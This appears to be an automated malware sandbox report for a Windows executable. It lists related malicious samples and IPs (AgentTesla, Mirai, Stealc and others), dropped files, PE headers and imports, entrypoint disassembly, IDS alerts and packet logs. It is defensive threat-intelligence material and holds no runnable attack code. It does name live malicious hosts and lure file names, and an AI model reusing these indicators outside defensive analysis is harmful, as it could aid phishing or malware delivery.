	SecuriteInfo.com.Win64.Malware-gen.19901.26035.exe	Get hash	malicious	Python Stealer, Monster Stealer	Browse	185.199.109.133
	bcb.vbs	Get hash	malicious	Unknown	Browse	185.199.111.133
	cac.js	Get hash	malicious	Unknown	Browse	185.199.109.133
	SecuriteInfo.com.Trojan.DownLoad4.16905.7671.26379.exe	Get hash	malicious	AsyncRAT, DcRat	Browse	185.199.109.133
	SecuriteInfo.com.Trojan.DownLoad4.16905.7671.26379.exe	Get hash	malicious	AsyncRAT, DcRat	Browse	185.199.110.133
	Payment slip.vbs	Get hash	malicious	Unknown	Browse	185.199.111.133
	file.exe	Get hash	malicious	Unknown	Browse	185.199.111.133
	file.exe	Get hash	malicious	Unknown	Browse	185.199.111.133
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	185.199.109.133
api.ipify.org	2b7cu0KwZl.exe	Get hash	malicious	Unknown	Browse	172.67.74.152
	2b7cu0KwZl.exe	Get hash	malicious	Unknown	Browse	104.26.13.205
	Zc9eO57fgF.elf	Get hash	malicious	Unknown	Browse	172.67.74.152
	Payslip_October_2024_pdf.exe	Get hash	malicious	AgentTesla	Browse	172.67.74.152
	Quotation.exe	Get hash	malicious	AgentTesla	Browse	104.26.13.205
	Copia de pago de la Orden de compra OI16014 y OI16015.exe	Get hash	malicious	AgentTesla	Browse	104.26.12.205
	QUOTATION#09678.exe	Get hash	malicious	AgentTesla	Browse	172.67.74.152
	Payslip_October_2024_pdf.exe	Get hash	malicious	AgentTesla	Browse	104.26.13.205
	V7FWuG5Lct.exe	Get hash	malicious	Quasar	Browse	172.67.74.152
	7ll96oOSBF.exe	Get hash	malicious	Quasar	Browse	104.26.12.205

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
FranceTelecom-OrangeFR	mpsl.elf	Get hash	malicious	Mirai	Browse	92.148.66.176
	arm4.elf	Get hash	malicious	Mirai	Browse	92.184.111.24
	na.elf	Get hash	malicious	Mirai	Browse	86.225.67.68
	ppc.elf	Get hash	malicious	Mirai	Browse	86.251.252.109
	sora.sh4.elf	Get hash	malicious	Mirai	Browse	92.136.82.82
	sora.m68k.elf	Get hash	malicious	Mirai	Browse	90.117.235.131
	sora.arm.elf	Get hash	malicious	Mirai	Browse	90.120.253.168
	nullnet_load.arm.elf	Get hash	malicious	Mirai	Browse	92.140.8.96
	DbMBWMxoNv.exe	Get hash	malicious	Stealc, Vidar	Browse	2.2.2.2
	spc.elf	Get hash	malicious	Mirai	Browse	92.166.126.185
CLOUDFLARENETUS	Pedido de Cota#U00e7#U00e3o-24110004.vbs	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.96.3
	20241104095027_PDF.vbs	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.96.3
	Order 54004308 - DewertOkin.vbs	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	Transfer-X9_20241104_1255.PDF.vbs	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	Document.xla.xlsx	Get hash	malicious	FormBook, HTMLPhisher	Browse	172.67.159.147
	QUOTATION_NOVQTRA071244.PDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	https://ibnnafeeslab.com/i/?bGFuZz1lbiZzdj1nZW5lcmFsJnJib3g9ZnJhcmFtemk=#	Get hash	malicious	Unknown	Browse	104.17.25.14
	JMFoyLSCjP.exe	Get hash	malicious	Stealc, Vidar	Browse	172.64.41.3
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse	172.67.133.135
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	172.64.41.3
CLOUDFLARENETUS	Pedido de Cota#U00e7#U00e3o-24110004.vbs	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.96.3
	20241104095027_PDF.vbs	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.96.3
	Order 54004308 - DewertOkin.vbs	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	Transfer-X9_20241104_1255.PDF.vbs	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	Document.xla.xlsx	Get hash	malicious	FormBook, HTMLPhisher	Browse	172.67.159.147
	QUOTATION_NOVQTRA071244.PDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	https://ibnnafeeslab.com/i/?bGFuZz1lbiZzdj1nZW5lcmFsJnJib3g9ZnJhcmFtemk=#	Get hash	malicious	Unknown	Browse	104.17.25.14
	JMFoyLSCjP.exe	Get hash	malicious	Stealc, Vidar	Browse	172.64.41.3
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar	Browse	172.67.133.135
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	172.64.41.3
FASTLYUS	file.exe	Get hash	malicious	Credential Flusher	Browse	151.101.129.91
	file.exe	Get hash	malicious	Credential Flusher	Browse	151.101.193.91
	https://r.mailing.campingcarpark.com/tr/cl/m2JPJkzPDbfL5s2bDabtlPRATYRQylIubPPupv_vc3kDzIWW2_TNYLb8YBmBuxxUamsx-FMq6iQDKP4aBiozKtmctIWJHvB_jMPMQCy2V9w9n7PdBiSom_VscfyxjRbqNIYqjqLTOUl5-9LarkHqAVm5L2wSo2oXxGVlFSK9ch7-9o3rO6zfaWOVTBYD4bj-cBh9D46nF7VLeW5JX646w9BMjGtwIbaonCu5pf0X8ov7yR1QFDHFtwW10C7XEoZag-1kPqsvroBYGdEMlwciu7AuBU1Y26NjgdB1vb4QnVOsIs_acQZJzGs0n3fybIY3bzcEJyP_Oy1jYqrav3I9lVVIjNjH0id0gdS4TbucLqy31-2RoRtZQc8bVuUs9GXZATyHwjK94EM9fKm3gaQ0u6Km4OhvabjJRJ1r26CvdUmHO1SK4HumQKUTUp8TXSmV-Stnpm_CGVl-UuJ0NvRq2I4Xw9uT__o0aJIGY71Xtr5Z7Y_et8YZZEgYR8N-C3PmDstWGdA9-IDO6X1D8sJVLEuj4ynD4q9-hO3nCsqHsDxKxs0cmE6rNpf8r-UvD1nXZ_a-VWCTi1NHu4b8MXaBheK-JZ2q5hHvkeAVzUdiXCOufUWyY-Ee97OlTdt1Y3IjIn0dj-CvUR17EtHIzPpKzFbJHJuSBA7gKlgbAXP5qj9Z9DYOs3fd4_dxBHDc4hFtPyERTdDEp75X34mcet-FOG2cCg6GELttByElL4HvrmfIJOs_BaLRaeRpYLsj2tIjMzr0T4OVWHBOW-Q1-iqoT_zCsmcuYUhzpgTIqTGpvB7QFG0i3ZF3aeteqWLx1NAZYNeYfLSsmOWLZWMqQuWpJNh5nxTAhUC-Ine_ExnFOYwfU5uvTSRkQ3WnzaJTik6lH8zjYuRq0R9zqImSml6gks4xbe9VZFCW-qtDzZihL-bjo2pnAM-z6PAC_JoDVrKTvQZZFhm5dMQTMyyNpmiJG_1gQ1xJxfcTrHmgDYLf	Get hash	malicious	HTMLPhisher	Browse	151.101.2.137
	http://r.srvtrck.com/v1/redirect?url=http://www.ritual.com&api_key=2787b73d6d1c026b48687320e239182a&site_id=e5c21d0795544b439bdb70bae77167c9&type=url&yk_tag=973511c5431487e8a29276d8e592449d	Get hash	malicious	Unknown	Browse	151.101.64.84
	file.exe	Get hash	malicious	Credential Flusher	Browse	151.101.65.91
	file.exe	Get hash	malicious	Credential Flusher	Browse	151.101.129.91
	PO.html	Get hash	malicious	Unknown	Browse	151.101.1.229
	file.exe	Get hash	malicious	Credential Flusher	Browse	151.101.129.91
	file.exe	Get hash	malicious	Credential Flusher	Browse	151.101.1.91
	file.exe	Get hash	malicious	Credential Flusher	Browse	151.101.1.91

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	0.7307872139132228
Encrypted:	false
SSDEEP:	3:NlllulF/lll:NllUF/ll
MD5:	3ECB05F56210644B241FF459B861D309
SHA1:	1A33420F5866C42A5ED3CFF0DD505451FBFA8072
SHA-256:	712FFFDDF0CCED8E7AD767551D53F38D2682E171595701A31F73AC916F7134E0
SHA-512:	79DC8B376BDAE7F0BA59108D89D9DA4CD6B1E7AB0280DB31A030E4C4507AB63D22D9DF6443DE18E92D64382AA97F051AC1D6FAFE07CA9281BEBD129A91EB19B8
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	@...e.................................^.........................

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mhvjrwye.fn2.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	high, very likely benign file
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_q3hkxvbv.cjm.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	high, very likely benign file
Preview:	# PowerShell test file to determine AppLocker lockdown mode

Static File Info

General

File type:	PE32+ executable (console) x86-64, for MS Windows
Entropy (8bit):	6.223005129526667
TrID:	Win64 Executable Console (202006/5) 92.65% Win64 Executable (generic) (12005/4) 5.51% Generic Win/DOS Executable (2004/3) 0.92% DOS Executable Generic (2002/1) 0.92% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	CFuejz2dRu.exe
File size:	6'226'432 bytes
MD5:	020b08da71b11949586b7a6185877b13
SHA1:	518117166ae0bab4b79d483e8de9c11e6b38ff50
SHA256:	5f343fef68caa4a9bfd673cd071b7f6dbac55995433735e35af63e018cabae3f
SHA512:	b689cf9f3b6b0dd78a7080f562fff1a4006bbf0482ac80a535b136e0286703d9ddeb5faa3e0c4ae6b8fe5a21fdd6fe642cd1a39c1f1338ee43fd588523a6f7e8
SSDEEP:	49152:JvEjmmgTOcm+7l0yI1k//veUZIu/Hg7KUIG03oSuNG1jR5EjMWctqYusNz5U4mlE:l7lae/Hg+JJXVE7BXsVp
TLSH:	EC564907EDE545E8C0AED2758A629253BE717C494B3123E72B60F7382F76BD06A79340
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d........._.......".......,.........`E........@..............................0d...........`... ............................

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x474560
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows cui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x0 [Thu Jan 1 00:00:00 1970 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	1
File Version Major:	6
File Version Minor:	1
Subsystem Version Major:	6
Subsystem Version Minor:	1
Import Hash:	d42595b695fc008ef2c56aabd8efd68e

Entrypoint Preview

Instruction
jmp 00007F2F28DFC260h
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
push ebp
dec eax
mov ebp, esp
pushfd
cld
dec eax
sub esp, 000000E0h
dec eax
mov dword ptr [esp], edi
dec eax
mov dword ptr [esp+08h], esi
dec eax
mov dword ptr [esp+10h], ebp
dec eax
mov dword ptr [esp+18h], ebx
dec esp
mov dword ptr [esp+20h], esp
dec esp
mov dword ptr [esp+28h], ebp
dec esp
mov dword ptr [esp+30h], esi
dec esp
mov dword ptr [esp+38h], edi
movups dqword ptr [esp+40h], xmm6
movups dqword ptr [esp+50h], xmm7
inc esp
movups dqword ptr [esp+60h], xmm0
inc esp
movups dqword ptr [esp+70h], xmm1
inc esp
movups dqword ptr [esp+00000080h], xmm2
inc esp
movups dqword ptr [esp+00000090h], xmm3
inc esp
movups dqword ptr [esp+000000A0h], xmm4
inc esp
movups dqword ptr [esp+000000B0h], xmm5
inc esp
movups dqword ptr [esp+000000C0h], xmm6
inc esp
movups dqword ptr [esp+000000D0h], xmm7
inc ebp
xorps xmm7, xmm7
dec ebp
xor esi, esi
dec eax
mov eax, dword ptr [005A686Ah]
dec eax
mov eax, dword ptr [eax]
dec eax
cmp eax, 00000000h
je 00007F2F28DFFB45h
dec esp
mov esi, dword ptr [eax]
dec eax
sub esp, 10h
dec eax
mov eax, ecx
dec eax
mov ebx, edx
call 00007F2F28E07CBBh

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x633000	0x53e	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x622000	0xfaf8	.pdata
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x634000	0xd514	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x5872c0	0x178	.data
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x2c0cb6	0x2c0e00	305ded77af37fc26e1a6d0e9cabf77b8	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x2c2000	0x2c4cb0	0x2c4e00	b7434947c6fbaf86a0701b74b58a9076	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x587000	0x9a280	0x4c400	320a4e9be796356f5efcd0474fc81582	False	0.3548603995901639	data	4.615330934451555	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata	0x622000	0xfaf8	0xfc00	f6cc8a59cf42294aa2c5ca3994ba844a	False	0.40425037202380953	data	5.454703654049661	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.xdata	0x632000	0xb4	0x200	9e81c921791a8bc9a30e7697581d2891	False	0.2265625	shared library	1.783206012798912	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.idata	0x633000	0x53e	0x600	dbdd8541e58ca4674adb1c8f14d45ee0	False	0.3756510416666667	OpenPGP Public Key	3.9721343948481436	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.reloc	0x634000	0xd514	0xd600	e5133074e696207666dc8d8dd6fbfbe4	False	0.24766355140186916	data	5.41768855761573	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.symtab	0x642000	0x4	0x200	07b5472d347d42780469fb2654b7fc54	False	0.02734375	data	0.020393135236084953	IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Imports

DLL

Import

kernel32.dll

WriteFile, WriteConsoleW, WerSetFlags, WerGetFlags, WaitForMultipleObjects, WaitForSingleObject, VirtualQuery, VirtualFree, VirtualAlloc, TlsAlloc, SwitchToThread, SuspendThread, SetWaitableTimer, SetProcessPriorityBoost, SetEvent, SetErrorMode, SetConsoleCtrlHandler, RtlVirtualUnwind, RtlLookupFunctionEntry, ResumeThread, RaiseFailFastException, PostQueuedCompletionStatus, LoadLibraryW, LoadLibraryExW, SetThreadContext, GetThreadContext, GetSystemInfo, GetSystemDirectoryA, GetStdHandle, GetQueuedCompletionStatusEx, GetProcessAffinityMask, GetProcAddress, GetErrorMode, GetEnvironmentStringsW, GetCurrentThreadId, GetConsoleMode, FreeEnvironmentStringsW, ExitProcess, DuplicateHandle, CreateWaitableTimerExW, CreateThread, CreateIoCompletionPort, CreateEventA, CloseHandle, AddVectoredExceptionHandler, AddVectoredContinueHandler

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-11-04T16:24:57.739368+0100	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	1	20.109.210.53	443	192.168.2.8	62044	TCP
2024-11-04T16:25:35.948910+0100	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	1	20.109.210.53	443	192.168.2.8	62049	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 4, 2024 16:24:40.998645067 CET	49704	443	192.168.2.8	104.26.13.205
Nov 4, 2024 16:24:40.998693943 CET	443	49704	104.26.13.205	192.168.2.8
Nov 4, 2024 16:24:40.998754978 CET	49704	443	192.168.2.8	104.26.13.205
Nov 4, 2024 16:24:40.999434948 CET	49704	443	192.168.2.8	104.26.13.205
Nov 4, 2024 16:24:40.999452114 CET	443	49704	104.26.13.205	192.168.2.8
Nov 4, 2024 16:24:42.405136108 CET	443	49704	104.26.13.205	192.168.2.8
Nov 4, 2024 16:24:42.405200958 CET	443	49704	104.26.13.205	192.168.2.8
Nov 4, 2024 16:24:42.405272007 CET	49704	443	192.168.2.8	104.26.13.205
Nov 4, 2024 16:24:42.405281067 CET	443	49704	104.26.13.205	192.168.2.8
Nov 4, 2024 16:24:42.405333042 CET	49704	443	192.168.2.8	104.26.13.205
Nov 4, 2024 16:24:42.525787115 CET	49704	443	192.168.2.8	104.26.13.205
Nov 4, 2024 16:24:42.525826931 CET	443	49704	104.26.13.205	192.168.2.8
Nov 4, 2024 16:24:42.525867939 CET	49704	443	192.168.2.8	104.26.13.205
Nov 4, 2024 16:24:42.525873899 CET	443	49704	104.26.13.205	192.168.2.8
Nov 4, 2024 16:24:42.526014090 CET	49704	443	192.168.2.8	104.26.13.205
Nov 4, 2024 16:24:42.526017904 CET	443	49704	104.26.13.205	192.168.2.8
Nov 4, 2024 16:24:42.651349068 CET	443	49704	104.26.13.205	192.168.2.8
Nov 4, 2024 16:24:42.651899099 CET	49704	443	192.168.2.8	104.26.13.205
Nov 4, 2024 16:24:42.651907921 CET	443	49704	104.26.13.205	192.168.2.8
Nov 4, 2024 16:24:42.656265974 CET	443	49704	104.26.13.205	192.168.2.8
Nov 4, 2024 16:24:42.703818083 CET	49704	443	192.168.2.8	104.26.13.205
Nov 4, 2024 16:24:42.731096983 CET	443	49704	104.26.13.205	192.168.2.8
Nov 4, 2024 16:24:42.770586967 CET	49704	443	192.168.2.8	104.26.13.205
Nov 4, 2024 16:24:43.938407898 CET	49705	443	192.168.2.8	185.199.108.133
Nov 4, 2024 16:24:43.938446999 CET	443	49705	185.199.108.133	192.168.2.8
Nov 4, 2024 16:24:43.938508034 CET	49705	443	192.168.2.8	185.199.108.133
Nov 4, 2024 16:24:43.939043045 CET	49705	443	192.168.2.8	185.199.108.133
Nov 4, 2024 16:24:43.939073086 CET	443	49705	185.199.108.133	192.168.2.8
Nov 4, 2024 16:24:44.768902063 CET	443	49705	185.199.108.133	192.168.2.8
Nov 4, 2024 16:24:44.830188990 CET	49705	443	192.168.2.8	185.199.108.133
Nov 4, 2024 16:24:44.831800938 CET	49705	443	192.168.2.8	185.199.108.133
Nov 4, 2024 16:24:44.831823111 CET	443	49705	185.199.108.133	192.168.2.8
Nov 4, 2024 16:24:44.832079887 CET	49705	443	192.168.2.8	185.199.108.133
Nov 4, 2024 16:24:44.832087994 CET	443	49705	185.199.108.133	192.168.2.8
Nov 4, 2024 16:24:44.833729982 CET	443	49705	185.199.108.133	192.168.2.8
Nov 4, 2024 16:24:44.833744049 CET	443	49705	185.199.108.133	192.168.2.8
Nov 4, 2024 16:24:44.833801031 CET	49705	443	192.168.2.8	185.199.108.133
Nov 4, 2024 16:24:44.884232044 CET	49705	443	192.168.2.8	185.199.108.133
Nov 4, 2024 16:24:44.884346008 CET	443	49705	185.199.108.133	192.168.2.8
Nov 4, 2024 16:24:44.884440899 CET	49705	443	192.168.2.8	185.199.108.133
Nov 4, 2024 16:24:44.884460926 CET	443	49705	185.199.108.133	192.168.2.8
Nov 4, 2024 16:24:44.935866117 CET	49705	443	192.168.2.8	185.199.108.133
Nov 4, 2024 16:24:45.054898977 CET	443	49705	185.199.108.133	192.168.2.8
Nov 4, 2024 16:24:45.054951906 CET	443	49705	185.199.108.133	192.168.2.8
Nov 4, 2024 16:24:45.054980993 CET	443	49705	185.199.108.133	192.168.2.8
Nov 4, 2024 16:24:45.055006027 CET	49705	443	192.168.2.8	185.199.108.133
Nov 4, 2024 16:24:45.055028915 CET	443	49705	185.199.108.133	192.168.2.8
Nov 4, 2024 16:24:45.055049896 CET	443	49705	185.199.108.133	192.168.2.8
Nov 4, 2024 16:24:45.055069923 CET	49705	443	192.168.2.8	185.199.108.133
Nov 4, 2024 16:24:45.055099010 CET	49705	443	192.168.2.8	185.199.108.133
Nov 4, 2024 16:24:45.056119919 CET	49705	443	192.168.2.8	185.199.108.133
Nov 4, 2024 16:24:45.056139946 CET	443	49705	185.199.108.133	192.168.2.8
Nov 4, 2024 16:24:45.056169033 CET	49705	443	192.168.2.8	185.199.108.133
Nov 4, 2024 16:24:45.057470083 CET	49706	443	192.168.2.8	185.199.108.133
Nov 4, 2024 16:24:45.057542086 CET	443	49706	185.199.108.133	192.168.2.8
Nov 4, 2024 16:24:45.057637930 CET	49706	443	192.168.2.8	185.199.108.133
Nov 4, 2024 16:24:45.058649063 CET	49706	443	192.168.2.8	185.199.108.133
Nov 4, 2024 16:24:45.058667898 CET	443	49706	185.199.108.133	192.168.2.8
Nov 4, 2024 16:24:45.870503902 CET	443	49706	185.199.108.133	192.168.2.8
Nov 4, 2024 16:24:45.870908022 CET	49706	443	192.168.2.8	185.199.108.133
Nov 4, 2024 16:24:45.870937109 CET	443	49706	185.199.108.133	192.168.2.8
Nov 4, 2024 16:24:45.871165037 CET	49706	443	192.168.2.8	185.199.108.133
Nov 4, 2024 16:24:45.871171951 CET	443	49706	185.199.108.133	192.168.2.8
Nov 4, 2024 16:24:45.872268915 CET	443	49706	185.199.108.133	192.168.2.8
Nov 4, 2024 16:24:45.872337103 CET	49706	443	192.168.2.8	185.199.108.133
Nov 4, 2024 16:24:45.879204035 CET	49706	443	192.168.2.8	185.199.108.133
Nov 4, 2024 16:24:45.879271030 CET	443	49706	185.199.108.133	192.168.2.8
Nov 4, 2024 16:24:45.879376888 CET	49706	443	192.168.2.8	185.199.108.133
Nov 4, 2024 16:24:45.879390001 CET	443	49706	185.199.108.133	192.168.2.8
Nov 4, 2024 16:24:45.927018881 CET	49706	443	192.168.2.8	185.199.108.133
Nov 4, 2024 16:24:46.088824034 CET	443	49706	185.199.108.133	192.168.2.8
Nov 4, 2024 16:24:46.088901043 CET	443	49706	185.199.108.133	192.168.2.8
Nov 4, 2024 16:24:46.088927031 CET	443	49706	185.199.108.133	192.168.2.8
Nov 4, 2024 16:24:46.088953018 CET	443	49706	185.199.108.133	192.168.2.8
Nov 4, 2024 16:24:46.088978052 CET	443	49706	185.199.108.133	192.168.2.8
Nov 4, 2024 16:24:46.089004040 CET	443	49706	185.199.108.133	192.168.2.8
Nov 4, 2024 16:24:46.089093924 CET	49706	443	192.168.2.8	185.199.108.133
Nov 4, 2024 16:24:46.089093924 CET	49706	443	192.168.2.8	185.199.108.133
Nov 4, 2024 16:24:46.089116096 CET	443	49706	185.199.108.133	192.168.2.8
Nov 4, 2024 16:24:46.089354992 CET	49706	443	192.168.2.8	185.199.108.133
Nov 4, 2024 16:24:46.089391947 CET	49706	443	192.168.2.8	185.199.108.133
Nov 4, 2024 16:24:46.092948914 CET	49707	443	192.168.2.8	185.199.108.133
Nov 4, 2024 16:24:46.092986107 CET	443	49707	185.199.108.133	192.168.2.8
Nov 4, 2024 16:24:46.093060017 CET	49707	443	192.168.2.8	185.199.108.133
Nov 4, 2024 16:24:46.093530893 CET	49707	443	192.168.2.8	185.199.108.133
Nov 4, 2024 16:24:46.093547106 CET	443	49707	185.199.108.133	192.168.2.8
Nov 4, 2024 16:24:47.165121078 CET	443	49707	185.199.108.133	192.168.2.8
Nov 4, 2024 16:24:47.165493965 CET	49707	443	192.168.2.8	185.199.108.133
Nov 4, 2024 16:24:47.165504932 CET	443	49707	185.199.108.133	192.168.2.8
Nov 4, 2024 16:24:47.165618896 CET	49707	443	192.168.2.8	185.199.108.133
Nov 4, 2024 16:24:47.165622950 CET	443	49707	185.199.108.133	192.168.2.8
Nov 4, 2024 16:24:47.166716099 CET	443	49707	185.199.108.133	192.168.2.8
Nov 4, 2024 16:24:47.166776896 CET	49707	443	192.168.2.8	185.199.108.133
Nov 4, 2024 16:24:47.167937994 CET	49707	443	192.168.2.8	185.199.108.133
Nov 4, 2024 16:24:47.168016911 CET	443	49707	185.199.108.133	192.168.2.8
Nov 4, 2024 16:24:47.168047905 CET	49707	443	192.168.2.8	185.199.108.133
Nov 4, 2024 16:24:47.211333036 CET	443	49707	185.199.108.133	192.168.2.8
Nov 4, 2024 16:24:47.215384960 CET	49707	443	192.168.2.8	185.199.108.133
Nov 4, 2024 16:24:47.215399981 CET	443	49707	185.199.108.133	192.168.2.8
Nov 4, 2024 16:24:47.263122082 CET	49707	443	192.168.2.8	185.199.108.133
Nov 4, 2024 16:24:47.333756924 CET	443	49707	185.199.108.133	192.168.2.8
Nov 4, 2024 16:24:47.333800077 CET	443	49707	185.199.108.133	192.168.2.8
Nov 4, 2024 16:24:47.333862066 CET	443	49707	185.199.108.133	192.168.2.8
Nov 4, 2024 16:24:47.333931923 CET	443	49707	185.199.108.133	192.168.2.8
Nov 4, 2024 16:24:47.333956003 CET	49707	443	192.168.2.8	185.199.108.133
Nov 4, 2024 16:24:47.333997965 CET	49707	443	192.168.2.8	185.199.108.133
Nov 4, 2024 16:24:47.334099054 CET	49707	443	192.168.2.8	185.199.108.133
Nov 4, 2024 16:24:47.334116936 CET	443	49707	185.199.108.133	192.168.2.8
Nov 4, 2024 16:24:47.334137917 CET	49707	443	192.168.2.8	185.199.108.133
Nov 4, 2024 16:24:47.378063917 CET	49708	443	192.168.2.8	188.114.97.3
Nov 4, 2024 16:24:47.378120899 CET	443	49708	188.114.97.3	192.168.2.8
Nov 4, 2024 16:24:47.378252029 CET	49708	443	192.168.2.8	188.114.97.3
Nov 4, 2024 16:24:47.378647089 CET	49708	443	192.168.2.8	188.114.97.3
Nov 4, 2024 16:24:47.378664017 CET	443	49708	188.114.97.3	192.168.2.8
Nov 4, 2024 16:24:48.217571020 CET	443	49708	188.114.97.3	192.168.2.8
Nov 4, 2024 16:24:48.218059063 CET	49708	443	192.168.2.8	188.114.97.3
Nov 4, 2024 16:24:48.218094110 CET	443	49708	188.114.97.3	192.168.2.8
Nov 4, 2024 16:24:48.218127012 CET	49708	443	192.168.2.8	188.114.97.3
Nov 4, 2024 16:24:48.218132973 CET	443	49708	188.114.97.3	192.168.2.8
Nov 4, 2024 16:24:48.219163895 CET	443	49708	188.114.97.3	192.168.2.8
Nov 4, 2024 16:24:48.219250917 CET	49708	443	192.168.2.8	188.114.97.3
Nov 4, 2024 16:24:48.220237970 CET	49708	443	192.168.2.8	188.114.97.3
Nov 4, 2024 16:24:48.220324039 CET	443	49708	188.114.97.3	192.168.2.8
Nov 4, 2024 16:24:48.220438004 CET	49708	443	192.168.2.8	188.114.97.3
Nov 4, 2024 16:24:48.220453978 CET	443	49708	188.114.97.3	192.168.2.8
Nov 4, 2024 16:24:48.220483065 CET	49708	443	192.168.2.8	188.114.97.3
